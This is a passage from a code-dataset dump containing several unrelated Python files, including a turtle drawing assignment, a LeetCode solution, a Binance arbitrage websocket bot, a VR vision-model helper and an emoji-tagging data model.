:) | \r\n# -----------------------------------------+\r\n\r\nimport turtle\r\n#initial creation of objects\r\ntortoise = turtle.Turtle()\r\ntortoisex = int(100)\r\ntortoisey = int(100)\r\ntortoiseradius = int()\r\nscreen = turtle.Screen()\r\nscreen.screensize(600,400,\"white\")\r\n#set to rgb color mode\r\nscreen.colormode(255)\r\n#tortoise.hideturtle()\r\n#drawing settings\r\ntortoise.speed(0)\r\n#color is bluish gray\r\ntortoise.color(179,200,229)\r\ntortoise.hideturtle()\r\n#arrow related variables\r\noverallarrowdistance = 17\r\nbottomarrowdistance = 12\r\nsidebitarrowdistance = 6 #name :(\r\n\r\n#function so I don't have to ctrlc-ctrlv all day\r\ndef drawcircle():\r\n tortoise.penup()\r\n tortoise.setposition(tortoisex,tortoisey)\r\n tortoise.pendown()\r\n tortoise.begin_fill()\r\n tortoise.circle(tortoiseradius)\r\n tortoise.end_fill()\r\n\r\n#function to make arrows scalable - should work because it's always moving a distance not scaling sides (hint: it didn't work)\r\n#set x, y, manipulate entirely w angle by encapsulating all of it\r\ndef drawarrow():\r\n tortoise.setposition(tortoisex,tortoisey)\r\n tortoise.begin_fill()\r\n tortoise.pendown()\r\n tortoise.right(90)\r\n tortoise.forward(overallarrowdistance)\r\n tortoise.right(90)\r\n tortoise.forward(sidebitarrowdistance)\r\n tortoise.left(90 + 45) #:^)\r\n tortoise.forward(overallarrowdistance)\r\n tortoise.left(90)\r\n tortoise.forward(overallarrowdistance)\r\n tortoise.left(45 + 90)\r\n tortoise.forward(sidebitarrowdistance)\r\n tortoise.right(90)\r\n tortoise.forward(overallarrowdistance)\r\n tortoise.left(90)\r\n tortoise.forward(bottomarrowdistance)\r\n tortoise.end_fill()\r\n tortoise.penup()\r\n \r\n#actual drawing - try to mostly use built in shapes and x-y coordinate setting\r\n#for loops for drawing continuous rectangles with curved edges\r\n#head\r\ntortoiseradius = 40\r\ndrawcircle()\r\n#left ear\r\ntortoisex = tortoisex - 35\r\ntortoisey = tortoisey + 23\r\ntortoiseradius = 12\r\ndrawcircle()\r\n#right ear\r\ntortoisex = 135\r\ntortoisey = 123\r\ntortoiseradius = 12\r\ndrawcircle()\r\n#neck\r\ntortoisex = 75\r\ntortoisey = 90\r\ntortoiseradius = 13\r\nfor i in range(9):\r\n tortoisex += 5\r\n drawcircle()\r\n#left shoulder\r\ntortoisex = 68\r\ntortoisey = 53\r\ntortoiseradius = 24\r\ndrawcircle()\r\n#right shoulder\r\ntortoisex = 132\r\ntortoisey = 53\r\ndrawcircle()\r\n#left arm before elbow\r\ntortoisex = 30\r\ntortoisey = 7\r\ntortoiseradius = 15\r\nfor i in range(8):\r\n tortoisey += 7\r\n tortoisex += 3\r\n drawcircle()\r\n#left arm after elbow\r\ntortoisex = 30\r\ntortoisey = 9\r\nfor i in range(7):\r\n tortoisex += 3\r\n tortoisey -= 1\r\n drawcircle()\r\n#right arm before elbow\r\ntortoisex = 170\r\ntortoisey = 7\r\nfor i in range(8):\r\n tortoisey += 7 \r\n tortoisex -= 3\r\n drawcircle()\r\n#right arm after elbow\r\ntortoisex = 170\r\ntortoisey = 9\r\nfor i in range(7):\r\n tortoisex -= 3\r\n tortoisey -= 1\r\n drawcircle()\r\n#straight line between elbow-elbow\r\ntortoisex = 53\r\ntortoisey = 2\r\nfor i in range(18):\r\n tortoisex += 5\r\n drawcircle()\r\n#fill in torso\r\ntortoisex = 100\r\ntortoisey = 20\r\ntortoiseradius = 50\r\ndrawcircle()\r\ntortoisex = 70\r\ntortoisey = 20\r\ntortoiseradius = 20\r\ndrawcircle()\r\ntortoisex = 130\r\ndrawcircle()\r\n#abdomen (?)\r\ntortoisex = 60\r\ntortoisey = -25\r\ntortoiseradius = 22\r\nfor i in range(15):\r\n tortoisex += 5\r\n drawcircle()\r\n#left leg\r\ntortoisex = 9\r\ntortoisey = -91\r\ntortoiseradius = 25\r\nfor i in range(15):\r\n tortoisex += 6\r\n 
tortoisey += 2.7\r\n drawcircle()\r\n#right leg\r\ntortoisex = 191\r\ntortoisey = -91\r\nfor i in range(15):\r\n tortoisex -= 6\r\n tortoisey += 2.7\r\n drawcircle()\r\n#straight line again\r\ntortoisex = 60\r\ntortoisey = -67\r\ntortoiseradius = 15\r\nfor i in range(12):\r\n tortoisex += 6\r\n drawcircle()\r\n#negative space near abdomen\r\ntortoise.color(255,255,255)\r\ntortoisex = 38\r\ntortoisey = -23.5\r\ntortoiseradius = 14\r\ndrawcircle()\r\ntortoisex = 162\r\ndrawcircle()\r\ntortoise.penup()\r\ntortoisex = 100\r\ntortoisey = 0\r\n#arrow head draw\r\ntortoisex = 94\r\ntortoisey = 179\r\ndrawarrow()\r\n#removal of a bit of line w a circle\r\ntortoisex = 101\r\ntortoisey = 185\r\ntortoiseradius = 5\r\ndrawcircle()\r\n#earth symbol\r\ntortoise.penup()\r\ntortoise.home()\r\ntortoisex = -200\r\ntortoisey = 65\r\ntortoise.setposition(tortoisex,tortoisey)\r\ntortoise.width(5)\r\n#greenish color\r\ntortoise.color(64,203,74)\r\ntortoise.pendown()\r\n#leftside backwards \"E\"\r\ntortoise.forward(30)\r\ntortoise.right(90)\r\ntortoise.forward(12)\r\ntortoise.right(90)\r\ntortoise.forward(34)\r\ntortoise.right(180)\r\ntortoise.forward(34)\r\ntortoise.right(90)\r\ntortoise.forward(12)\r\ntortoise.right(90)\r\ntortoise.forward(46)\r\ntortoise.right(90)\r\ntortoise.forward(12)\r\n#leftside angle bit \r\ntortoise.right(15)\r\ntortoise.forward(80)\r\n#top portion; in middle stop to go down to make spiral\r\ntortoise.right(75)\r\ntortoise.forward(30)\r\n#spiral begin\r\ntortoise.right(90)\r\ntortoise.penup()\r\ntortoise.forward(30)\r\ntortoise.pendown()\r\ntortoise.width(1)\r\ntortoise.left(90)\r\nfor i in range(30):\r\n distanceadd = 0\r\n distanceadd += i/4\r\n tortoise.forward(distanceadd)\r\n tortoise.right(40)\r\n#return back to top line\r\ntortoise.penup()\r\ntortoise.setheading(0)\r\ntortoise.left(180)\r\ntortoise.forward(12)\r\ntortoise.right(90)\r\ntortoise.width(5)\r\ntortoise.forward(32)\r\n#back to drawin da top\r\ntortoise.pendown()\r\ntortoise.right(90)\r\ntortoise.forward(30)\r\n#rightside angle bit \r\ntortoise.right(75)\r\ntortoise.forward(80)\r\ntortoise.right(15)\r\ntortoise.forward(12)\r\n#bottom right side \"E\"\r\ntortoise.right(90)\r\ntortoise.forward(46)\r\ntortoise.right(90)\r\ntortoise.forward(12)\r\ntortoise.right(90)\r\ntortoise.forward(34)\r\ntortoise.right(180)\r\ntortoise.forward(34)\r\ntortoise.right(90)\r\ntortoise.forward(12)\r\ntortoise.right(90)\r\ntortoise.forward(30)\r\nscreen.exitonclick()\r\n","repo_name":"baliiiiiii/csci107-python","sub_path":"andrew-lander-assignment3.py","file_name":"andrew-lander-assignment3.py","file_ext":"py","file_size_in_byte":6077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74118860713","text":"from collections import deque, defaultdict\nfrom functools import lru_cache\n\nMOD = 10 ** 9 + 7\n\n\n# https://leetcode.com/problems/count-different-palindromic-subsequences/discuss/109508/N2-DP-Python-with-Explanation/979094\nclass Solution:\n\n def __init__(self):\n self.forward = deque()\n self.backward = []\n\n def countPalindromicSubsequences(self, s: str) -> int:\n forward_dic = defaultdict(lambda: -1)\n for i in reversed(range(len(s))):\n ch = s[i]\n forward_dic[ch] = i\n self.forward.appendleft(forward_dic.copy())\n\n backward_dic = defaultdict(lambda: -1)\n for i in range(len(s)):\n ch = s[i]\n backward_dic[ch] = i\n self.backward.append(backward_dic.copy())\n\n return self.dp(0, len(s) - 1) - 1\n\n @lru_cache(None)\n def dp(self, forward_index, backward_index):\n if 
forward_index > backward_index:\n return 1\n\n res = 1\n\n for letter in ('a', 'b', 'c', 'd'):\n next_forward_index = self.forward[forward_index][letter]\n next_backward_index = self.backward[backward_index][letter]\n\n if next_forward_index == -1:\n continue\n\n if next_forward_index > backward_index or next_backward_index < forward_index:\n continue\n\n res += 1\n\n if next_forward_index < next_backward_index:\n res += self.dp(next_forward_index + 1, next_backward_index - 1)\n\n return res % MOD\n","repo_name":"cabulous/leetcode","sub_path":"python/730.py","file_name":"730.py","file_ext":"py","file_size_in_byte":1518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7552042405","text":"import gc\nimport json\nimport queue\nimport time\nimport traceback\nfrom ipcqueue import posixmq\nimport math\nimport matplotlib.pyplot as plt\nimport networkx\nfrom networkx import Graph, DiGraph, simple_cycles\nimport numpy\nimport yaml\nimport unicorn_binance_websocket_api\nfrom binance.client import Client\nfrom threading import Thread\nimport datetime\nclass globalgraph():\n global_graph = False\n global_circular = []\n FEE = 1.00075\n zero_trading_fee_promo = ['BUSDUSDT', 'TUSDBUSD', 'TUSDUSDT', 'USDCBUSD', 'USDCUSDT', 'USDPBUSD', 'USDPUSDT']\n bitcoin_trading_fee_promo = ['BUSDUSDT', 'TUSDBUSD', 'TUSDUSDT', 'USDCBUSD', 'USDCUSDT', 'USDPBUSD', 'USDPUSDT']\n GCCOUNTER_THRESHOLD = 600000\n FIFO = '/looppipe12'\n graph = {} # graph\n def main(self):\n gc.enable()\n with open(\"api.yaml\") as f:\n y = yaml.safe_load(f)\n api_key = y['api']\n api_secret = y['secret']\n pairlist = []\n client = Client(api_key, api_secret)\n exchange_info = client.get_exchange_info()['symbols']\n real_pair_listed = [pair['symbol'] for pair in exchange_info]\n exchange_info = exchange_info[:50]\n print(len(exchange_info))\n exchange_info = [item for item in exchange_info if 'EUR' not in item['symbol']]\n print(len(exchange_info))\n self.tab = {} # data\n self.bookdepthdf = {} # book depth\n coinlist = self.returncoinlist(exchange_info)\n print(len(coinlist))\n time.sleep(5)\n for coin1 in coinlist:\n self.tab[coin1] = {}\n self.bookdepthdf[coin1] = {}\n for coin2 in coinlist:\n self.tab[coin1][coin2] = numpy.NAN\n self.bookdepthdf[coin1][coin2] = numpy.NAN\n pairlist.append(coin1 + '.' + coin2)\n\n i = 0\n\n print(len(pairlist))\n bnb_wss_taker = Thread(target=\n self.threaded_func,\n args=(pairlist,))\n bnb_wss_taker.start()\n pairlist = []\n i = 0\n self.q = posixmq.Queue(self.FIFO)\n Thread(target=self.grapher,args=(self.graph,)).start()\n time.sleep(100)\n print(real_pair_listed)\n self.triangle_calculator(real_pair_listed)\n\n\n def returncoinlist(self,exchangeinfo):\n partial_list = []\n for pair in exchangeinfo:\n partial_list.append(pair['baseAsset'])\n partial_list.append(pair['quoteAsset'])\n return list(set(partial_list))\n\n def triangle_calculator(self,pairlist):\n while True:\n print('graph2',self.graph)\n if not globalgraph.global_graph or globalgraph.global_graph != self.graph:\n print(\"[!] 
Redrawing graph...\")\n G = Graph(self.graph)\n labels = dict(zip(G.nodes(), G.nodes()))\n networkx.draw_networkx(G, labels=labels)\n DG = DiGraph(G)\n circular = list(simple_cycles(DG))\n closed_loop_list = [loop for loop in circular if len(loop) == 3]\n globalgraph.global_graph=self.graph\n globalgraph.global_circular=circular\n else:\n closed_loop_list = [loop for loop in globalgraph.global_circular if len(loop) == 3]\n print(f\"loops max 3 found{closed_loop_list} length loop {len(closed_loop_list)}\")\n #loop_calculator(df,closed_loop_list[0],pairlist,handle)\n for loop in closed_loop_list:\n #Thread(target=loop_calculator,args=(df,loop,pairlist,q,bookdepthdf)).start()\n self.loop_calculator(loop,pairlist)\n\n def loop_calculator(self,loop,pairlist):\n try:\n \"\"\"['ETH', 'BTC', 'EUR'] => [\"ETHBTC\", \"BTCEUR\", \"EURETH\"]\"\"\"\n pairs = [[loop[0],loop[1]],[loop[1],loop[2]],[loop[2],loop[0]]]\n prices=[]\n depths=[]\n margin =0.0\n for pair in pairs:\n if self.isfloat(self.tab[pair[0]][pair[1]]):\n #print(\"Testing\",pair[0]+pair[1])\n if pair[0]+pair[1] in pairlist:\n margin += math.log(float(self.tab[pair[1]][pair[0]]))\n depths.append(self.bookdepthdf[pair[1]][pair[0]])\n prices.append(self.tab[pair[1]][pair[0]])\n if pair[0]+pair[1] in self.zero_trading_fee_promo or pair[1]+pair[0] in self.zero_trading_fee_promo or pair[0]+pair[1] in self.bitcoin_trading_fee_promo or pair[1]+pair[0] in self.bitcoin_trading_fee_promo:\n margin-= 0\n else:\n margin-= 0.00075\n else:\n margin += -math.log(float(self.tab[pair[1]][pair[0]]))\n depths.append(self.bookdepthdf[pair[1]][pair[0]])\n prices.append(self.tab[pair[1]][pair[0]])\n if pair[0]+pair[1] in self.zero_trading_fee_promo or pair[1]+pair[0] in self.zero_trading_fee_promo or pair[0]+pair[1] in self.bitcoin_trading_fee_promo or pair[1]+pair[0] in self.bitcoin_trading_fee_promo:\n margin-= 0\n else:\n margin-= 0.00075\n print(\"Loop %s\\t\\tMargin %f%%\"%(str(loop),margin*100))\n api_message_push = {'loop':pairs,'margin':round(margin*100,5),'prices':prices,'depths':depths,'timestamp':int(datetime.datetime.now().timestamp())}\n if float(api_message_push['margin'])>0:\n with open('timestamplog','a') as f:\n f.write(f\"Timestamp rilevated on websocketgroup: {datetime.datetime.now().timestamp()}\\n\")\n self.q.put(str(api_message_push))\n except Exception as e:\n with open('culo.txt','a') as f:\n f.write(str(traceback.format_exc()))\n\n def pair_list_slimmer(self,pair_list, pair):\n new_pair_list = []\n for second_pair in pair_list:\n if pair.split('.')[0] in second_pair or pair.split('.')[1] in second_pair:\n new_pair_list.append(second_pair)\n new_pair_list.remove(pair)\n return new_pair_list\n\n def isfloat(self,num):\n try:\n float(num)\n return True\n except ValueError:\n return False\n\n def grapher(self,graph):\n print('Grapher started...')\n while True:\n G=Graph(graph)\n labels = dict(zip(G.nodes(),G.nodes()))\n networkx.draw_networkx(G,labels=labels)\n DG = DiGraph(G)\n plt.show()\n\n\n\n\n def subscribe_wss(self,api_manager, pairlist):\n stream=[item.lower().replace('.','') for item in pairlist]\n print('sublen %d firstdata %s'%(len(stream),stream[0]))\n api_manager.create_stream(channels=['bookTicker'],markets=stream)\n\n\n def threaded_func(self, pairlist):\n print('Starting WSS connection')\n binance_websocket_api_manager = unicorn_binance_websocket_api.BinanceWebSocketApiManager(exchange=\"binance.com\")\n withoutpoint_topoint = dict()\n Thread(target=self.subscribe_wss, args=(binance_websocket_api_manager, 
pairlist)).start()\n for pair in pairlist:\n print('Create stream for %s' % (pair.replace('.', '')))\n withoutpoint_topoint[pair.replace('.', '')] = pair\n while True:\n try:\n oldest_stream_data_from_stream_buffer = binance_websocket_api_manager \\\n .pop_stream_data_from_stream_buffer()\n if oldest_stream_data_from_stream_buffer:\n res_bnb = oldest_stream_data_from_stream_buffer\n if 'result' not in res_bnb:\n # conn.sendall(res_bnb.encode())\n # print(res_bnb)\n try:\n if not self.graph[withoutpoint_topoint[json.loads(res_bnb)['data']['s']].split('.')[0]].__contains__(\n withoutpoint_topoint[json.loads(res_bnb)['data']['s']].split('.')[\n 1]):\n self.graph[withoutpoint_topoint[json.loads(res_bnb)['data']['s']].split('.')[0]].append(\n withoutpoint_topoint[json.loads(res_bnb)['data']['s']].split('.')[\n 1])\n except:\n self.graph[withoutpoint_topoint[json.loads(res_bnb)['data']['s']].split('.')[0]] = []\n\n self.tab[withoutpoint_topoint[json.loads(res_bnb)['data']['s']].split('.')[0]][\n withoutpoint_topoint[json.loads(res_bnb)['data']['s']].split('.')[\n 1]] = json.loads(res_bnb)['data']['a']\n self.tab[withoutpoint_topoint[json.loads(res_bnb)['data']['s']].split('.')[1]][\n withoutpoint_topoint[json.loads(res_bnb)['data']['s']].split('.')[\n 0]] = json.loads(res_bnb)['data']['b']\n self.bookdepthdf[withoutpoint_topoint[json.loads(res_bnb)['data']['s']].split('.')[0]][\n withoutpoint_topoint[json.loads(res_bnb)['data']['s']].split('.')[\n 1]] = json.loads(res_bnb)['data']['A']\n self.bookdepthdf[withoutpoint_topoint[json.loads(res_bnb)['data']['s']].split('.')[1]][\n withoutpoint_topoint[json.loads(res_bnb)['data']['s']].split('.')[\n 0]] = json.loads(res_bnb)['data']['B']\n\n else:\n continue\n except:\n continue\n\n\n def log(self,trace, print_flag=False):\n if print_flag:\n print(trace)\n with open('emakerlog', 'a+') as file:\n file.write(\n str(datetime.datetime.now().astimezone()) + \" VVVVVVVVVVVVVVVVVVVVVVV\\n\" + trace + '\\n\\n')\n\ndef go():\n g=globalgraph()\n g.main()\nif __name__ == \"__main__\":\n print('ok')\n #sys.stderr = object\n q1 = queue.Queue()\n go()","repo_name":"701789262a/triangular","sub_path":"websocketgroup.py","file_name":"websocketgroup.py","file_ext":"py","file_size_in_byte":10153,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41793047116","text":"# -*- coding: utf-8 -*-\n# __author__: musibii\n# __file__ : test1.py\n# __time__ : 2020/4/29 11:05 上午\n\nimport rbac.acl\nacl = rbac.acl.Registry()\n\nacl.add_role()\nacl.add_resource(acl)\n\nacl.allow()\nacl.deny()\n\nacl.is_allowed()\n","repo_name":"zuanzuanshao/ModuleStudy","sub_path":"permissions/test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33446399356","text":"import os\nimport time\n\nimport psutil\n\nfrom DaisyX import bot_start_time\n\nfrom .utils import formatter\n\n\nasync def bot_sys_stats():\n bot_uptime = int(time.time() - bot_start_time)\n cpu = psutil.cpu_percent()\n mem = psutil.virtual_memory().percent\n disk = psutil.disk_usage(\"/\").percent\n process = psutil.Process(os.getpid())\n stats = f\"\"\"\n{USERBOT_USERNAME}@William\n------------------\nUPTIME: {formatter.get_readable_time((bot_uptime))}\nBOT: {round(process.memory_info()[0] / 1024 ** 2)} MB\nCPU: {cpu}%\nRAM: {mem}%\nDISK: {disk}%\n\"\"\"\n return 
stats\n","repo_name":"MatheeshaOfficial/Hermione-old","sub_path":"DaisyX/modules/states.py","file_name":"states.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"26502376865","text":"import timeit\nimport time\nimport os\nimport math\nimport numpy as np\nfrom PIL import Image\nfrom scipy.io import loadmat\n\nfrom VIS_parameters import params\nfrom VIS_ParamVR import ModelParam\nfrom VIS_VisualVR import Highlight\n\n\ndef CalculatePanTilt(SaccStart_Px, SaccStop_Px):\n '''\n Calculate Pan and Tilt for agent's saccade in VR.\n\n params: SaccStart_Px -- numpy array with coordinates of Saccade's start point in pixel\n SaccStop_Px -- numpy array with coordinates of Saccade's stop point in pixel\n\n return: Pan -- scalar value with amount of Pan in Degree\n Tilt -- scalar value with amount of Tilt in Degree\n '''\n\n Alpha_Deg = 102. / 2.\n Alpha_Rad = Alpha_Deg * math.pi / 180.\n Half_Width = ModelParam['resIm'][0] / 2.\n Eye_VF_Distance = Half_Width / math.tan(Alpha_Rad)\n\n Pan_AlphaT_Rad = math.atan((SaccStop_Px[0] - SaccStart_Px[0]) / Eye_VF_Distance)\n Pan_AlphaT_Deg = Pan_AlphaT_Rad * 180. / math.pi\n Pan = Pan_AlphaT_Deg # round(Pan_AlphaT_Deg)\n\n Alpha_Deg = 77. / 2.\n Alpha_Rad = Alpha_Deg * math.pi / 180.\n Half_Width = ModelParam['resIm'][1] / 2.\n Eye_VF_Distance = Half_Width / math.tan(Alpha_Rad)\n\n Tilt_AlphaT_Rad = math.atan((SaccStart_Px[1] - SaccStop_Px[1]) / Eye_VF_Distance)\n Tilt_AlphaT_Deg = Tilt_AlphaT_Rad * 180. / math.pi\n Tilt = Tilt_AlphaT_Deg # round(Tilt_AlphaT_Deg)\n\n return Pan, Tilt\n\n\ndef CheckWithMATLAB(rV1C):\n '''\n In debug mode (ModelParam['Debug_Mode'] = True) one can use this function to compare the result\n of preprocessing of Python and Matlab.\n\n params: rV1C -- numpy array containing rate of V1-Complex neurons (pre-processed image)\n '''\n\n MATLAB_rV1C = loadmat(ModelParam['DataDir'] + 'rV1CS.mat')['rV1C']\n\n if np.max(np.abs(rV1C-MATLAB_rV1C)) > 0.0001:\n print(\"\\n\", Highlight('Warning: Matlab and Python make different results in pre-processing phase.',\n 'Yellow', Bold = True))\n else:\n print(\"\\n\", Highlight('Matlab and Python make same results in pre-processing phase.',\n 'Green', Bold = True))\n\n\ndef CoG(A):\n '''\n calculate Center of Gravity (CoG) of an array\n\n params: A -- array\n\n return: Centers -- numpy array with coordinates of Center of Gravity\n '''\n\n rc, cc = np.mgrid[0:A.shape[0], 0:A.shape[1]]\n Mt = sum(sum(A))\n Centers = np.zeros(2)\n Centers[0] = sum(sum(A * rc)) / Mt\n Centers[1] = sum(sum(A * cc)) / Mt\n\n return Centers\n\n\ndef MakeMovie(ShowMovie=False, DeleteFrames=True):\n '''\n After completion of the simulation and if ModelParam['Make_Movie'] is True, some numbered\n png files (e.g. 0000.png, 0001.png, 0002.png, ...) should be generated as single frames of a\n movie. 
This function, first makes such single frames based on saved images and then, uses a\n Linux instruction (ffmpeg) to make a movie from these single frames.\n\n params: ShowMovie -- show the Movie immediately after simulation\n default: False\n DeleteFrames -- delete genereted (remaned) png files\n default: True\n '''\n\n # Change the current directory to the results directory.\n CurrentDir = os.getcwd()\n os.chdir(ModelParam['ResultDir'])\n\n # The following for loop makes frames based on saved image files.\n # It's basically a renaming\n for entry in os.scandir('./'):\n StFilename = entry.path\n if ModelParam['OutputFileName'] in StFilename:\n step = int(StFilename.split('_')[-1][:-4])\n FrFilename = \"{:>04d}.png\".format(step)\n Frame = Image.open(StFilename)\n Frame.save(FrFilename)\n\n # Delete the old probable movie with the same filename.\n MovFilename = ModelParam['Movie_Filename'] + ModelParam['OutputFileName'].split('_')[-2] + '.mp4'\n Movie_File = open(MovFilename, 'w')\n Movie_File.close()\n St = 'rm ' + MovFilename\n os.system(St)\n\n St = 'ffmpeg -framerate 2 -i %04d.png -r 30 -pix_fmt yuv420p ' + MovFilename\n os.system(St)\n\n # Delete the frames after making the movie file (by default).\n if DeleteFrames:\n os.system('rm 0*.*')\n\n # Delete the saved graphical results.\n if not ModelParam['SaveImagesInOneFile']:\n St = 'rm ' + ModelParam['OutputFileName'] + '*.png'\n os.system(St)\n\n # Show the movie on demand.\n if ShowMovie:\n St = 'ffplay ' + MovFilename\n os.system(St)\n\n os.chdir(CurrentDir) # Back to the previous directory.\n\n\ndef PFCObj(ObjNo):\n '''\n return proper value of PFC based on what is already saved in Object Memory (OM).\n OM is a matrix which is saved in a *.mat file.\n\n params: ObjNo -- integer number in [0, 14] interval\n\n return: OBJ -- vector which retrieved from Object Memory and should be assigned to the PFC\n '''\n\n OBJ = loadmat(params['path_weightMat'])['OM'][ObjNo].astype(float)\n print(Highlight('The PFC is:', 'Yellow', Bold = True))\n print(OBJ)\n print(Highlight('----------------------------------------------------------------------------------------------------', 'Yellow', Bold = True))\n return OBJ\n\n\ndef ProgramEnd(First_Start):\n '''\n Generate message about whole time consumed during simulation and then ends the program safely\n\n params: First_Start -- start time of simulation\n '''\n Last_Stop = timeit.default_timer()\n if ModelParam['Make_Movie']:\n MakeMovie()\n print(Highlight('\\n----------------------------------------------------------------------------------------------------', 'Red', Bold = True))\n print(Highlight('The whole simulation has been finished in %f seconds.' 
% (Last_Stop-First_Start),\n 'Green', Bold=True))\n print(Highlight('Press Enter to quit.', 'Red', Bold=True))\n\n\ndef ReadImageFromVR(annarInterface):\n '''\n Read an image from VR agent's left eye\n\n params: annarInterface -- ANNarchy Interface\n\n return: LImage -- numpy array of shape (height, width, 3) with values from 0 to 1\n containing Left Image received from VR\n '''\n\n ret = False\n while not ret:\n ret = annarInterface.checkImages()\n\n Tmp = annarInterface.getImageLeft()\n LImage = np.array(Tmp) / 255.\n LImage = LImage / LImage.max()\n\n return LImage\n\ndef SaccadeControl_new(rFEFm, FEFfix, FinishCounter, Step):\n '''\n Determining if the saccade should be run or not based on the rates of neurons in FEFm layer.\n If maximum value of FEFm neurons is bigger than a threshold, the new saccade coordinates will be\n calculated.\n\n params: rFEFm -- current firing rates of FEF Movement Layer\n '''\n\n CurSac = np.asarray([0, 0])\n NewSac = False\n LowResponse = 0.8\n if FinishCounter == -1:\n Max_Row, Max_Col = np.unravel_index(rFEFm.argmax(), rFEFm.shape)\n MaxFEFm = rFEFm[Max_Row, Max_Col]\n\n if MaxFEFm > ModelParam['SaccadeThreshold']:\n print(Highlight('\\nAfter step ' + str(Step + 1) + ' Max(FEFm) = ' + str(MaxFEFm),\n 'Green', Bold=True))\n St = 'Max_Row = ' + str(Max_Row) + '\\tMax_Col = ' + str(Max_Col)\n print(Highlight(St, 'Green', Bold=True))\n rFEFm[rFEFm < LowResponse * ModelParam['SaccadeThreshold']] = 0\n CurSac = CoG(rFEFm)\n print(\"Eye position should be on: \", np.round(CurSac + 1, 2))\n NewSac = True\n #FinishCounter = 20\n FEFfix.r = 1.0\n else:\n FinishCounter -= 1\n return FinishCounter, NewSac, CurSac\n\n\ndef TargetName(TNo):\n '''\n return proper name based on what already saved in object memory\n\n params: TNo -- integer of Target Number\n\n return: string containing corresponding name\n '''\n\n namePerNo = {0: \"Yellow Crane\", 1: \"Green Crane\", 2: \"Green Race Car\", 3: \"Blue Book\",\n 4: \"Yellow Duck\", 5: \"Red Pencil\", 6: \"Blue Pencil\", 7: \"Green Pencil\",\n 8: \"Dummy\", 9: \"Painting\", 10: \"Red Car\", 11: \"Green Car\", 12: \"Teddy Bear\",\n 13: \"Yellow Truck\", 14: \"Green Ball\"}\n\n return namePerNo[TNo]\n\n\ndef waitTillExecuted(annarInterface, ID, timeout = -1):\n '''\n wait until one action in VR would be executed\n\n params: annarInterface -- ANNarchy Interface\n ID -- action ID\n timeout -- default: -1 (function waits for the Action State. 
could be infinity!)\n\n return: actionState -- Action State\n '''\n\n ret = False\n actionState = 0\n\n if timeout == -1:\n\n while actionState == 0:\n ret = annarInterface.checkActionExecState(ID)\n if ret:\n actionState = annarInterface.getActionExecState()\n return actionState\n\n # else\n start_time = time.time()\n dur = 0\n while (actionState == 0) and dur < timeout:\n dur = time.time() - start_time\n ret = annarInterface.checkActionExecState(ID)\n if ret:\n actionState = annarInterface.getActionExecState()\n\n if dur >= timeout:\n print(\"Timeout\")\n\n return actionState","repo_name":"hamkerlab/Burkhardt2023_SpatialCognition","sub_path":"VIS/VIS_MainHelperVR.py","file_name":"VIS_MainHelperVR.py","file_ext":"py","file_size_in_byte":9104,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"33091426867","text":"# -*- coding: utf-8 -*-\n\n\nfrom google.appengine.ext import ndb\nfrom google.appengine.api import urlfetch\nimport webapp2\n\nimport json\n\nimport logging\nimport parameters\nimport person\nimport emojiTables\nimport utility\nimport languages\n\nfrom collections import defaultdict\n\n\n###################\n# MAIN CLASS Tagging\n###################\n\nclass UserTagging(ndb.Model):\n # id = lang_code chat_id\n timestamp = ndb.DateTimeProperty(auto_now=True)\n chat_id = ndb.IntegerProperty()\n lang_code = ndb.StringProperty()\n ongoingAlreadyTaggedEmojis = ndb.IntegerProperty(default=0) #number of emoji given to user already tagged by other useres\n ongoingUpperCaseTags = ndb.IntegerProperty(default=0)\n last_emoji = ndb.StringProperty()\n emojiTagsTable = ndb.PickleProperty()\n disableDiacriticsWarning = ndb.BooleanProperty(default=False)\n # emoji -> tag\n\n def wasEmojiTagged(self, emoji_utf):\n #emoji_uni = emoji_utf.decode('utf-8')\n #return self.emojiTagsTable.has_key(emoji_uni)\n return self.emojiTagsTable.has_key(emoji_utf)\n\n def getNumberOfTaggedEmoji(self):\n return len(self.emojiTagsTable)\n\n def setLastEmoji(self, emoji, random):\n self.last_emoji = emoji\n if random:\n self.ongoingAlreadyTaggedEmojis = 0\n else:\n self.ongoingAlreadyTaggedEmojis += 1\n self.put()\n\n def getLanguageCode(self):\n return self.lang_code.encode('utf-8')\n\n def getLastEmoji(self):\n if self.last_emoji:\n return self.last_emoji.encode('utf-8')\n return None\n\n def removeLastEmoji(self, put=False):\n self.last_emoji = ''\n if put:\n self.put()\n\n def addTagsToLastEmoji(self, tags, put=False):\n last_emoji_utf = self.getLastEmoji()\n self.emojiTagsTable[last_emoji_utf] = tags\n if put:\n self.put()\n\n def currentLanguageHasRomanLetters(self):\n return languages.isRomanScript(self.getLanguageCode())\n\n def currentLanguageHasDiacritics(self):\n return languages.hasDiacritics(self.getLanguageCode())\n\n def updateUpperCounts(self, tag, put=False):\n if self.currentLanguageHasRomanLetters():\n self.updateTagUpperCount(tag)\n if put:\n self.put()\n\n # returns\n # 0 (more than x consecutive non-upper cases),\n # 1 (less than x consectuve upper-cases),\n # 2 (more than x consecutive upper-cases)\n def updateTagUpperCount(self, tag):\n if tag[0].isupper():\n if self.ongoingUpperCaseTags < 0:\n self.ongoingUpperCaseTags = 0\n else:\n self.ongoingUpperCaseTags += 1\n else:\n if self.ongoingUpperCaseTags > 0:\n self.ongoingUpperCaseTags = 0\n elif self.ongoingUpperCaseTags > -parameters.COUNT_CONSECUTIVE_UPPER_WORDS_BEFORE_MESSAGE:\n self.ongoingUpperCaseTags -= 1\n\n def tagUpperCountLevel(self):\n if 
